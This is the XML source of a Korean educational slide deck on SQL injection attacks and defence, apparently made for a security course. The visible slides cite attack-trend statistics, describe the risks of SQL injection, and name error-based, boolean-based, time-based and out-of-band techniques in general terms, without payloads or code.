            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4860032" y="1806104"/>
            <a:ext cx="4104456" cy="3639120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정보 보안 전문업체 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="2200" dirty="0" smtClean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200" dirty="0" err="1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펜타시큐리티시스템에서</a:t>
            </a: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발표한 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR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2016</a:t>
            </a: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년도 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR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‘</a:t>
            </a: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웹 공격 동향</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR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(WATT)</a:t>
            </a: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보고서</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR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’</a:t>
            </a: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에 따르면 전체 웹 공격 중 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR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SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="2200" dirty="0" err="1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인젝션</a:t>
            </a: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공격의 비율이 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR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45%</a:t>
            </a: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로</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="2200" dirty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</a:t>
            </a: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가장 높다고 나와있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="2200" dirty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.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
                <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
                <a:cs typeface="조선일보명조" panose="02030304000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="2200" dirty="0" smtClean="0">
              <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
              <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
              <a:cs typeface="조선일보명조" panose="02030304000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0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endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="2000" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln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0709533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07504" y="116632"/>
            <a:ext cx="6488113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4.  SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="3200" b="1" dirty="0" err="1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인젝션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 공격의 위험성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/>
              <a:cs typeface="조선일보명조" panose="02030304000000000000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251520" y="1340768"/>
            <a:ext cx="8568952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400" dirty="0" err="1">
                <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
                <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
              </a:rPr>
              <a:t>인젝션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(SQL Injection; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1">
                <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
                <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
              </a:rPr>
              <a:t>SQLi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)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을 사용하면 공격자는 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
              <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
                <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
              </a:rPr>
              <a:t>고객 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데이터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개인 정보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거래 비밀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지적 재산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, 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그리고 다른 민감한 정보에 무단 접근 권한을 가질 수 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
                <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
              <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
                <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
              </a:rPr>
              <a:t> 또한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, SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
                <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
              </a:rPr>
              <a:t>인젝션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 공격으로 해커는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
                <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
              </a:rPr>
              <a:t>웝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 어플리케이션 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
                <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
              </a:rPr>
              <a:t>인증과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ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
                <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
              </a:rPr>
              <a:t>허가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
                <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
              </a:rPr>
              <a:t>매커니즘을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 우회하고 데이터베이스 전체의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
                <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
              </a:rPr>
              <a:t>컨텐츠들을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ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
                <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
              </a:rPr>
              <a:t>가져올 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수 있습니다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. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
              <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
                <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
              </a:rPr>
              <a:t>뿐만 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아니라 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400" dirty="0" err="1">
                <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
                <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
              </a:rPr>
              <a:t>인젝션</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
                <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
              </a:rPr>
              <a:t> 공격은 데이터베이스에 기록을 더하고 변경하며 삭제하는데 사용할 수 있어 데이터 무결성에 영향을 주게 됩니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
                <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
              <a:ea typeface="제주명조" pitchFamily="2" charset="-127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3871" y="4581128"/>
            <a:ext cx="5128409" cy="1920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이등변 삼각형 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5197760" y="22312"/>
            <a:ext cx="548680" cy="504056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8" name="_PO1"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="-142875"/>
            <a:ext cx="9144000" cy="1051595"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="595959"/>
          </a:solidFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="A2A2A2"/>
            </a:solidFill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1" lang="ko-KR" alt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 panose="02030304000000000000" pitchFamily="18" charset="-127"/>
              <a:cs typeface="조선일보명조" panose="02030304000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="_PO2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="107504" y="116632"/>
            <a:ext cx="6488113" cy="623888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400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1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1" lang="en-US" altLang="ko-KR" sz="3200" b="1" dirty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5</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR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.  SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="3200" b="1" dirty="0" err="1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인젝션</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
                <a:ea typeface="조선일보명조"/>
                <a:cs typeface="조선일보명조" panose="02030304000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> 공격의 접근법</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ko-KR" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="조선일보명조" panose="02030304000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="조선일보명조"/>
              <a:cs typeface="조선일보명조" panose="02030304000000000000" pitchFamily="18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251520" y="1412776"/>
            <a:ext cx="8640960" cy="489364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base">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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1) 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오류 기반 </a:t>
            </a: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100" dirty="0" err="1">
                <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
                <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
              </a:rPr>
              <a:t>인젝션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 공격</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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 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-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데이터베이스 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오류를 생성해 데이터베이스에 대한 내부 정보를 가져온다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endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty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2) 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불린</a:t>
            </a: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(Boolean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)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기반 </a:t>
            </a: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100" dirty="0" err="1">
                <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
                <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
              </a:rPr>
              <a:t>인젝션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 공격</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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 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-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상반되는 </a:t>
            </a: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쿼리들을 이용해 어플리케이션의 취약 정도를 파악한다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endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty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3) 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시간 기반 </a:t>
            </a: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100" dirty="0" err="1">
                <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
                <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
              </a:rPr>
              <a:t>인젝션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 공격</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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   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- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2100" dirty="0" smtClean="0">
                <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
                <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
              </a:rPr>
              <a:t>데이터베이스에게 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반응하기 전에 일정 시간만큼 기다리라고 지시한다</a:t>
            </a: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.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
              <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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4) 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대역 외 </a:t>
            </a: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SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
                <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
              </a:rPr>
              <a:t>인젝션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 공격</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2100" dirty="0" smtClean="0">
                <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
                <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
              </a:rPr>
              <a:t>   - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2100" dirty="0">
                <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
                <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
              </a:rPr>
              <a:t>자료를 데이터베이스 서버에서 해커에 의해 통제되는 기계로 직접 보낸다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2100" dirty="0">
                <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
                <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2100" dirty="0">
              <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
              <a:ea typeface="제주명조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52741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회색조">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="000000"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="F8F8F8"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="DDDDDD"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="B2B2B2"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="969696"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="808080"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="5F5F5F"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="4D4D4D"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="5F5F5F"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="919191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Metro</Template>
  <TotalTime>2817</TotalTime>
  <Words>1534</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>화면 슬라이드 쇼(4:3)</PresentationFormat>
  <Paragraphs>187</Paragraphs>
  <Slides>44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44</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="51" baseType="lpstr">
      <vt:lpstr>굴림</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>제주고딕</vt:lpstr>
      <vt:lpstr>제주명조</vt:lpstr>
      <vt:lpstr>맑은 고딕</vt:lpstr>
      <vt:lpstr>조선일보명조</vt:lpstr>
      <vt:lpstr>Office 테마</vt:lpstr>
      <vt:lpstr>3조    SQL 인젝션 공격 및 방어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슬라이드 1</dc:title>
  <dc:creator>서동윤</dc:creator>
  <cp:lastModifiedBy>BOB-206</cp:lastModifiedBy>
  <cp:revision>114</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-10-07T05:14:42Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-12-05T00:29:37Z</dcterms:modified>
</cp:coreProperties>
</file>